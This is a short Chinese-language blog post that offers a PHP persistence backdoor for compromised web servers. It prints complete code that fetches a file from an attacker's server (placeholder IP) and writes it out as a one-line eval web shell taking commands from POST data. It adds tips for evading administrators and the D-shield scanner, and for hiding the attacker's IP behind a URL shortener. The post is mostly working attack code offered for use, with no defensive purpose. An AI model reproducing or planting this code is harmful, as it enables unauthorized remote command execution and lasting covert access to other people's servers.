簡單又較隱蔽的PHP後門

許洪臣發表於2020-12-11

簡單又較隱蔽的PHP後門


話不多說,直接上程式碼(backdoor.php)

<?php
function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
	curl_close($ch);
	fclose($fp);
	ob_flush();
	flush();
}
if(adminer("http://xx.xx.xx.xx/config.txt","shell.php")) {
	echo "success, access shell.php";
} else {
	echo "fail";
}
?>

Tips1:xx.xx.xx.xx是你的VPS伺服器,config.txt要放在你的伺服器上,並且能訪問。config.txt的內容為一句話,如下:

<?php eval(@$_POST['cmd']);?>

接著訪問backdoor.php檔案即可在目標伺服器上生成一句話後門

在這裡插入圖片描述

Tips2:在實戰中記得把檔名修改一下,否則很容易被管理員發現。
這種許可權維持的方法相對於直接留下一句話檔案要更加穩定,即使管理員將一句話後門檔案刪除了,只要backdoor.php檔案還在,就可以一直生成後門檔案。而且D盾還檢測不出backdoor.php檔案。如果手上沒有免殺PHP後門的朋友們,不妨可以退而求其次,嘗試一下。
在這裡插入圖片描述

Tips3:backdoor.php檔案中會出現你的VPS伺服器IP地址,這在一定程度上會有被反制的風險。那我們可以將URL轉換成短連結進行隱匿。
短連結線上轉換網址:ReURL - 傳送門
在這裡插入圖片描述

短連結還原網址:https://www.donglishuzhai.net/tools/hy.php

經過測試,ReURL生成的短連結,上面的還原網站也還原不出來。

相關文章